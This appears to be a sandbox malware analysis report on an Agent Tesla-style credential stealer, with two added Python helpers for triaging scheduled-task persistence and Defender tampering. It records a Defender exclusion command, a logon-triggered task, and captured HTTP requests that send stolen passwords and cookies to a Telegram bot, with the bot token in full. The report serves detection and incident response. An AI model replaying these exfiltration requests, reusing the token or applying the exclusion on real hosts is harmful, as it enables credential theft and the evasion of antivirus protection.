                                                    SSDEEP:24:2di4+S2qh/S1K2ky1mo2dUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL4jxvn:cgea6YrFdOFzOzN33ODOiDdKrsuTkdv
                                                    MD5:42890865684624F53E3DB4DD9D878F49
                                                    SHA1:F2DF00CB7531E509DBE9F0FF7DE5B01F7686E02C
                                                    SHA-256:4566F7797D9FCAC9BE63661D9C0900A537AAAB70814DDBAF5A6A448DE8379FB8
                                                    SHA-512:249DCD4967A643205AC28256B91858BD685D27CBD7092C2E6D2F64EA9AB8F79852AFA20706819CE6616AA2A1FBA980446B5EE52B1132A8F810D0EA36580CFF9C
                                                    Malicious:true
                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailab
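The dropped task definition above is the persistence mechanism the report attributes to schtasks.exe. The following is an added example (not code from the Joe Sandbox report) that parses a Task Scheduler XML file and reduces it to the fields a responder cares about: which triggers are enabled, who the task runs as, and what it executes. The sample task is constructed from the elements visible in the report's preview; the preview is cut off inside <Settings>, so the <Actions> element and its command path are assumed here for illustration (the path is the one the dropped PowerShell transcript excludes from Defender, which the report does not itself tie to this task).

```python
"""Persistence triage for a Task Scheduler XML definition.

Added example, not part of the Joe Sandbox report. SAMPLE_TASK_XML reproduces
the elements visible in the report's preview of the dropped task file; the
<Actions> element and its command path are ASSUMED for illustration.
"""
import json
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

SAMPLE_TASK_XML = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>computer\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>computer\user</UserId>
    </LogonTrigger>
    <RegistrationTrigger>
      <Enabled>false</Enabled>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>computer\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\user\AppData\Roaming\kqruryFrIFc.exe</Command>
    </Exec>
  </Actions>
</Task>
"""
# Task files under C:\Windows\System32\Tasks are UTF-16 with a BOM, as the declaration says;
# expat detects the byte order from the BOM, so the raw file bytes can be fed straight in.
SAMPLE_TASK_BYTES = SAMPLE_TASK_XML.encode("utf-16")


def _local(tag: str) -> str:
    """Strip the XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def _text(elem, path: str, default: str = "") -> str:
    node = elem.find(path, NS)
    return node.text.strip() if node is not None and node.text else default


def triage_task(task_bytes: bytes) -> dict:
    """Summarise triggers, principal and actions, and tag the persistence indicators."""
    root = ET.fromstring(task_bytes)

    enabled = []
    triggers = root.find("t:Triggers", NS)
    if triggers is not None:
        for trig in triggers:
            # A trigger without an <Enabled> child is enabled by default.
            if _text(trig, "t:Enabled", "true").lower() != "false":
                enabled.append(_local(trig.tag))

    who = {}
    principal = root.find("t:Principals/t:Principal", NS)
    if principal is not None:
        who = {k: _text(principal, "t:" + k) for k in ("UserId", "LogonType", "RunLevel")}

    commands = []
    for ex in root.iterfind("t:Actions/t:Exec", NS):
        commands.append((_text(ex, "t:Command") + " " + _text(ex, "t:Arguments")).strip())

    indicators = []
    if "LogonTrigger" in enabled:
        indicators.append("logon-persistence")          # re-executes at every interactive logon
    if any(m in c.lower() for c in commands for m in ("\\appdata\\", "\\temp\\", "\\public\\")):
        indicators.append("exec-from-user-writable-path")
    if who.get("RunLevel") == "LeastPrivilege":
        indicators.append("no-elevation-needed")        # registers without a UAC prompt

    return {
        "author": _text(root, "t:RegistrationInfo/t:Author"),
        "registered": _text(root, "t:RegistrationInfo/t:Date"),
        "enabled_triggers": enabled,
        "principal": who,
        "commands": commands,
        "indicators": indicators,
    }


if __name__ == "__main__":
    print(json.dumps(triage_task(SAMPLE_TASK_BYTES), indent=2))
```

On a live host the same XML can be pulled with `schtasks /query /tn <name> /xml`, and a Security log configured to audit object access records task creation as event 4698 with the full task XML in its event data, so the same function can run over exported events. Note the registration <Date> of 2014 against an August 2022 analysis: the field is written by whoever builds the XML and is not a reliable creation time.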
                                                    Process:C:\Users\user\Desktop\wKQpOZ58Gl.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):801280
                                                    Entropy (8bit):7.692214428514328
                                                    Encrypted:false
                                                    SSDEEP:12288:hk2xg+ugGp2SrKUhxw3YjusvkRgutp43ARSepVIAnlFxCn9nLtzHeb:y2xgP01D3tRgutOzepVIAlLGnc
                                                    MD5:F7C9CF1410373A60A5C5A5E02AA4BD3C
                                                    SHA1:97CF7689F3B6DFD0EFD37E7F16AA1BD2CFE537DE
                                                    SHA-256:B5A23C2EF617A9A0B87F82EBC9F6C2C892A179A53BD35CE725BE92C68465B245
                                                    SHA-512:CF5BF661E5A61D3D64BAE9DB4D0FFDABCB37BA0AFEB9CE668F8CF284D0B37627658744B6EF9D12976F191A96462BC997A6A9F426CA1B1E48785F41B13B9EC64F
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Virustotal, Detection: 58%, Browse
                                                    • Antivirus: Metadefender, Detection: 26%, Browse
                                                    • Antivirus: ReversingLabs, Detection: 69%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....h...............0.. ...........>... ...@....@.. ....................................@.................................D>..O....@.......................`......(>............................................... ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......8..............@..B................x>......H........e..........4........&...........................................0............}......}......}....."...@}.....s....% ....o.....}...........%.r...p.%.r...p.%.r%..p.}......}.....(.......(.....~....t....rE..po........{....o....&.(.....*.0.............(......{!..........s....o......{'...~j...%-.&~i.........s....%.j...o......{<..........s....o .....{/..........s....o......{9..........s....o......{4..........s....o......{5..........s....o......{2..........s....o!.....{6.....
                                                    Process:C:\Users\user\Desktop\wKQpOZ58Gl.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                    Process:C:\Users\user\Desktop\wKQpOZ58Gl.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.6951152985249047
                                                    Encrypted:false
                                                    SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
                                                    MD5:EA7F9615D77815B5FFF7C15179C6C560
                                                    SHA1:3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
                                                    SHA-256:A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
                                                    SHA-512:9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):5823
                                                    Entropy (8bit):5.379640905451343
                                                    Encrypted:false
                                                    SSDEEP:96:BZYTLRNbtyqDo1ZerZsTLRNbtyqDo1ZaHt5tPtjZsTLRNbtyqDo1ZRgt/t/tFZy:KTQtDt2B11c
                                                    MD5:AA51436F359F179B13C378A25400B57B
                                                    SHA1:5475ECFCCB96DDC21AEE9E1F7AF15CB7FC631709
                                                    SHA-256:0A69FABF20881D38889AD87BB59058651DAD9B9E449BD4E668ADE2F244E4E7E3
                                                    SHA-512:2C53C83181B92B4F64766FD51445E641B921AD543BC48604E8DF0074ED995EAAA3710B1DF06745063C682AA1995C2C2045EDB76A5FF3B314030EBBD53D3F5DE3
                                                    Malicious:false
                                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20220805122338..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 390120 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\kqruryFrIFc.exe..Process ID: 6088..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220805122338..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\kqruryFrIFc.exe..**********************..Windows PowerShell transcript start..Start time: 20220805122644..Username: computer\user..RunAs User: DES
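The transcript above is the evidence behind the "Adds a directory exclusion to Windows Defender" signature: powershell.exe was launched with `Add-MpPreference -ExclusionPath` already on its command line (the Host Application field), so the exclusion is visible in the header even before the first `PS>` prompt. The following is an added example (not code from the Joe Sandbox report) that parses the PowerShell transcript format into sessions and flags Defender preference tampering. SAMPLE_TRANSCRIPT is constructed: its first session reproduces the header fields and command visible in the report's preview (UTF-8 BOM, CRLF line endings); the second session is invented, with a harmless command, to show what the filter ignores. The report's own second session is cut off in the preview and is not reproduced.

```python
"""Pull Defender-tampering commands out of a PowerShell transcript.

Added example, not part of the Joe Sandbox report. SAMPLE_TRANSCRIPT is
constructed; only its first session mirrors the report's preview.
"""
import re

SEPARATOR = "**********************"
SESSION_START = "Windows PowerShell transcript start"

SAMPLE_TRANSCRIPT = "\ufeff" + "\r\n".join([
    SEPARATOR,
    SESSION_START,
    "Start time: 20220805122338",
    "Username: computer\\user",
    "RunAs User: computer\\user",
    "Configuration Name: ",
    "Machine: 390120 (Microsoft Windows NT 10.0.17134.0)",
    "Host Application: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "Add-MpPreference -ExclusionPath C:\\Users\\user\\AppData\\Roaming\\kqruryFrIFc.exe",
    "Process ID: 6088",
    "PSVersion: 5.1.17134.1",
    SEPARATOR,
    SEPARATOR,
    "Command start time: 20220805122338",
    SEPARATOR,
    "PS>Add-MpPreference -ExclusionPath C:\\Users\\user\\AppData\\Roaming\\kqruryFrIFc.exe",
    SEPARATOR,
    SESSION_START,                       # second session: invented, benign
    "Start time: 20220805122644",
    "Username: computer\\user",
    "RunAs User: computer\\user",
    "Host Application: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "Process ID: 4242",
    SEPARATOR,
    "PS>Get-Date",
    "",
])

MP_CMDLET = re.compile(r"\b((?:Add|Set|Remove)-MpPreference)\b(.*)", re.IGNORECASE)
EXCLUSION_ARG = re.compile(r"-Exclusion(?:Path|Process|Extension|IpAddress)\s+(\S+)", re.IGNORECASE)
DISABLE_ARG = re.compile(r"(-Disable\w+)\s+(?:\$true|1)\b", re.IGNORECASE)


def parse_transcript(text: str) -> list:
    """Split a transcript into sessions: header fields (key: value) plus the PS> command lines."""
    sessions, current = [], None
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line == SEPARATOR:
            continue
        if line == SESSION_START:
            current = {"fields": {}, "commands": []}
            sessions.append(current)
        elif current is None:
            continue
        elif line.startswith("PS>"):
            current["commands"].append(line[3:].strip())
        elif ":" in line:
            # Header lines; command output containing a colon lands here too and is harmless.
            key, _, value = line.partition(":")
            current["fields"].setdefault(key.strip(), value.strip())
    return sessions


def defender_tampering(sessions: list) -> list:
    """One finding per session that touched Defender preferences. The Host Application
    line is scanned as well, because a dropper passes the cmdlet on powershell.exe's
    command line rather than typing it at a prompt."""
    findings = []
    for s in sessions:
        cmdlets, exclusions, disabled = [], [], []
        for text in s["commands"] + [s["fields"].get("Host Application", "")]:
            m = MP_CMDLET.search(text)
            if not m:
                continue
            cmdlet, args = m.group(1), m.group(2)
            if cmdlet not in cmdlets:
                cmdlets.append(cmdlet)
            for path in EXCLUSION_ARG.findall(args):
                if path not in exclusions:
                    exclusions.append(path)
            for param in DISABLE_ARG.findall(args):
                if param not in disabled:
                    disabled.append(param)
        if cmdlets:
            findings.append({
                "pid": s["fields"].get("Process ID"),
                "user": s["fields"].get("RunAs User"),
                "start": s["fields"].get("Start time"),
                "cmdlets": cmdlets,
                "exclusions": exclusions,
                "disabled": disabled,
            })
    return findings


if __name__ == "__main__":
    for finding in defender_tampering(parse_transcript(SAMPLE_TRANSCRIPT)):
        print(finding)
```

The sandbox had transcription switched on; in production the same text comes from the "Turn on PowerShell Transcription" policy, and the tampering is independently recorded by Defender itself as event 5007 (configuration change) in the Microsoft-Windows-Windows Defender/Operational log. `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` lists what is currently excluded on a host under review.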
                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.692214428514328
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:wKQpOZ58Gl.exe
                                                    File size:801280
                                                    MD5:f7c9cf1410373a60a5c5a5e02aa4bd3c
                                                    SHA1:97cf7689f3b6dfd0efd37e7f16aa1bd2cfe537de
                                                    SHA256:b5a23c2ef617a9a0b87f82ebc9f6c2c892a179a53bd35ce725be92c68465b245
                                                    SHA512:cf5bf661e5a61d3d64bae9db4d0ffdabcb37ba0afeb9ce668f8cf284d0b37627658744b6ef9d12976f191a96462bc997a6a9f426ca1b1e48785f41b13b9ec64f
                                                    SSDEEP:12288:hk2xg+ugGp2SrKUhxw3YjusvkRgutp43ARSepVIAnlFxCn9nLtzHeb:y2xgP01D3tRgutOzepVIAlLGnc
                                                    TLSH:0205E090B9689B22D67EE7F8947121106BF17C66252AE79D2EC134CE0CB3F944E31E53
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....h...............0.. ...........>... ...@....@.. ....................................@................................
                                                    Icon Hash:13332f0f0f3b3313
                                                    Entrypoint:0x4c3e96
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0xED6817C1 [Mon Mar 19 19:00:17 2096 UTC] (a date in 2096 cannot be a real build time; deterministic .NET builds and obfuscators write arbitrary values into this field, so treat it as a triage cue, not proof of tampering)
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
(The 97 further instructions listed by the report, all "add byte ptr [eax], al", are the disassembly of zero padding: the byte pair 00 00 decodes to that instruction. The 6-byte jmp through the single IAT slot at RVA 0x2000 is the standard native entry stub of a .NET executable: control passes to mscoree!_CorExeMain, which loads the runtime and runs the managed entry point.)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc3e44 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x14f8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc6000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc3e28 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc1e9c | 0xc2000 | False | 0.8389678640463918 | data | 7.704114614834008 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc4000 | 0x14f8 | 0x1600 | False | 0.2373934659090909 | data | 4.363906918934409 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc6000 | 0xc | 0x200 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0xc40e8 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294967295, next used block 4294967295 | |
RT_GROUP_ICON | 0xc5190 | 0x14 | data | |
RT_VERSION | 0xc51a4 | 0x354 | data | |

DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
08/05/22-12:24:11.625878 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49783 | 443 | 192.168.2.6 | 149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 5, 2022 12:24:10.854499102 CEST | 49783 | 443 | 192.168.2.6 | 149.154.167.220
Aug 5, 2022 12:24:10.854537964 CEST | 443 | 49783 | 149.154.167.220 | 192.168.2.6
Aug 5, 2022 12:24:10.854635954 CEST | 49783 | 443 | 192.168.2.6 | 149.154.167.220
Aug 5, 2022 12:24:10.924236059 CEST | 49783 | 443 | 192.168.2.6 | 149.154.167.220
Aug 5, 2022 12:24:10.924259901 CEST | 443 | 49783 | 149.154.167.220 | 192.168.2.6
Aug 5, 2022 12:24:10.994270086 CEST | 443 | 49783 | 149.154.167.220 | 192.168.2.6
Aug 5, 2022 12:24:10.994432926 CEST | 49783 | 443 | 192.168.2.6 | 149.154.167.220
Aug 5, 2022 12:24:11.000766993 CEST | 49783 | 443 | 192.168.2.6 | 149.154.167.220
Aug 5, 2022 12:24:11.000791073 CEST | 443 | 49783 | 149.154.167.220 | 192.168.2.6
Aug 5, 2022 12:24:11.001038074 CEST | 443 | 49783 | 149.154.167.220 | 192.168.2.6
Aug 5, 2022 12:24:11.059721947 CEST | 49783 | 443 | 192.168.2.6 | 149.154.167.220
Aug 5, 2022 12:24:11.595803976 CEST | 49783 | 443 | 192.168.2.6 | 149.154.167.220
Aug 5, 2022 12:24:11.622961998 CEST | 443 | 49783 | 149.154.167.220 | 192.168.2.6
Aug 5, 2022 12:24:11.625746965 CEST | 49783 | 443 | 192.168.2.6 | 149.154.167.220
Aug 5, 2022 12:24:11.667386055 CEST | 443 | 49783 | 149.154.167.220 | 192.168.2.6
Aug 5, 2022 12:24:11.726914883 CEST | 443 | 49783 | 149.154.167.220 | 192.168.2.6
Aug 5, 2022 12:24:11.727098942 CEST | 443 | 49783 | 149.154.167.220 | 192.168.2.6
Aug 5, 2022 12:24:11.727216005 CEST | 49783 | 443 | 192.168.2.6 | 149.154.167.220
Aug 5, 2022 12:24:11.728471994 CEST | 49783 | 443 | 192.168.2.6 | 149.154.167.220
Aug 5, 2022 12:24:15.063647032 CEST | 49785 | 443 | 192.168.2.6 | 149.154.167.220
Aug 5, 2022 12:24:15.063714027 CEST | 443 | 49785 | 149.154.167.220 | 192.168.2.6
Aug 5, 2022 12:24:15.063843012 CEST | 49785 | 443 | 192.168.2.6 | 149.154.167.220
Aug 5, 2022 12:24:15.064291000 CEST | 49785 | 443 | 192.168.2.6 | 149.154.167.220
Aug 5, 2022 12:24:15.064317942 CEST | 443 | 49785 | 149.154.167.220 | 192.168.2.6
Aug 5, 2022 12:24:15.123514891 CEST | 443 | 49785 | 149.154.167.220 | 192.168.2.6
Aug 5, 2022 12:24:15.128974915 CEST | 49785 | 443 | 192.168.2.6 | 149.154.167.220
Aug 5, 2022 12:24:15.129007101 CEST | 443 | 49785 | 149.154.167.220 | 192.168.2.6
Aug 5, 2022 12:24:15.182610989 CEST | 443 | 49785 | 149.154.167.220 | 192.168.2.6
Aug 5, 2022 12:24:15.186424017 CEST | 49785 | 443 | 192.168.2.6 | 149.154.167.220
Aug 5, 2022 12:24:15.186489105 CEST | 443 | 49785 | 149.154.167.220 | 192.168.2.6
Aug 5, 2022 12:24:15.343751907 CEST | 443 | 49785 | 149.154.167.220 | 192.168.2.6
Aug 5, 2022 12:24:15.343875885 CEST | 443 | 49785 | 149.154.167.220 | 192.168.2.6
Aug 5, 2022 12:24:15.344340086 CEST | 49785 | 443 | 192.168.2.6 | 149.154.167.220
Aug 5, 2022 12:24:15.344724894 CEST | 49785 | 443 | 192.168.2.6 | 149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 5, 2022 12:24:10.806818008 CEST | 50029 | 53 | 192.168.2.6 | 8.8.8.8
Aug 5, 2022 12:24:10.823792934 CEST | 53 | 50029 | 8.8.8.8 | 192.168.2.6
Aug 5, 2022 12:24:15.043509960 CEST | 51194 | 53 | 192.168.2.6 | 8.8.8.8
Aug 5, 2022 12:24:15.062397003 CEST | 53 | 51194 | 8.8.8.8 | 192.168.2.6

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 5, 2022 12:24:10.806818008 CEST | 192.168.2.6 | 8.8.8.8 | 0xb3e8 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001)
Aug 5, 2022 12:24:15.043509960 CEST | 192.168.2.6 | 8.8.8.8 | 0x5240 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001)

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 5, 2022 12:24:10.823792934 CEST | 8.8.8.8 | 192.168.2.6 | 0xb3e8 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001)
Aug 5, 2022 12:24:15.062397003 CEST | 8.8.8.8 | 192.168.2.6 | 0x5240 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001)
                                                    • api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49783 | 149.154.167.220 | 443 | C:\Users\user\Desktop\wKQpOZ58Gl.exe

Timestamp | kBytes transferred | Direction | Data
2022-08-05 10:24:11 UTC | 0 | OUT | POST /bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8da76e30dae4492
Host: api.telegram.org
Content-Length: 1019
Expect: 100-continue
Connection: Keep-Alive
2022-08-05 10:24:11 UTC | 0 | IN | HTTP/1.1 100 Continue
2022-08-05 10:24:11 UTC | 0 | OUT | Data Ascii: -----------------------------8da76e30dae4492Content-Disposition: form-data; name="chat_id"1428355250-----------------------------8da76e30dae4492Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/390120OSF
2022-08-05 10:24:11 UTC | 1 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0
                                                    Date: Fri, 05 Aug 2022 10:24:11 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 595
                                                    Connection: close
                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                    {"ok":true,"result":{"message_id":833,"from":{"id":5589784704,"is_bot":true,"first_name":"7886754","username":"Citihubbot"},"chat":{"id":1428355250,"first_name":"CitiHub","type":"private"},"date":1659695051,"document":{"file_name":"user-390120 2022-08-05 01-04-27.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIDQWLs78vr8FAf5fIGnNOR0OputL9MAAJIDQACNppgU0-zMNDgK5LbKQQ","file_unique_id":"AgADSA0AAjaaYFM","file_size":443},"caption":"New PW Recovered!\n\nUser Name: user/390120\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49785 | 149.154.167.220 | 443 | C:\Users\user\Desktop\wKQpOZ58Gl.exe

Timestamp | kBytes transferred | Direction | Data
2022-08-05 10:24:15 UTC | 2 | OUT | POST /bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8da76e3c93cca40
Host: api.telegram.org
Content-Length: 1900
Expect: 100-continue
2022-08-05 10:24:15 UTC | 2 | IN | HTTP/1.1 100 Continue
2022-08-05 10:24:15 UTC | 2 | OUT | Data Ascii: -----------------------------8da76e3c93cca40Content-Disposition: form-data; name="chat_id"1428355250-----------------------------8da76e3c93cca40Content-Disposition: form-data; name="caption"New Cookie Recovered!User Name: user/390120
2022-08-05 10:24:15 UTC | 4 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0
                                                    Date: Fri, 05 Aug 2022 10:24:15 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 605
                                                    Connection: close
                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                    {"ok":true,"result":{"message_id":834,"from":{"id":5589784704,"is_bot":true,"first_name":"7886754","username":"Citihubbot"},"chat":{"id":1428355250,"first_name":"CitiHub","type":"private"},"date":1659695055,"document":{"file_name":"user-390120 2022-08-05 01-09-19.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIDQmLs78-kWdb69NohEB65REyeaQlxAAJJDQACNppgU7Pr6Et4DUP_KQQ","file_unique_id":"AgADSQ0AAjaaYFM","file_size":1315},"caption":"New Cookie Recovered!\n\nUser Name: user/390120\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}



Target ID: 0
Start time: 12:23:11
Start date: 05/08/2022
Path: C:\Users\user\Desktop\wKQpOZ58Gl.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\wKQpOZ58Gl.exe"
Imagebase: 0x10000
File size: 801280 bytes
MD5 hash: F7C9CF1410373A60A5C5A5E02AA4BD3C
Has elevated privileges: true
Has administrator privileges: true
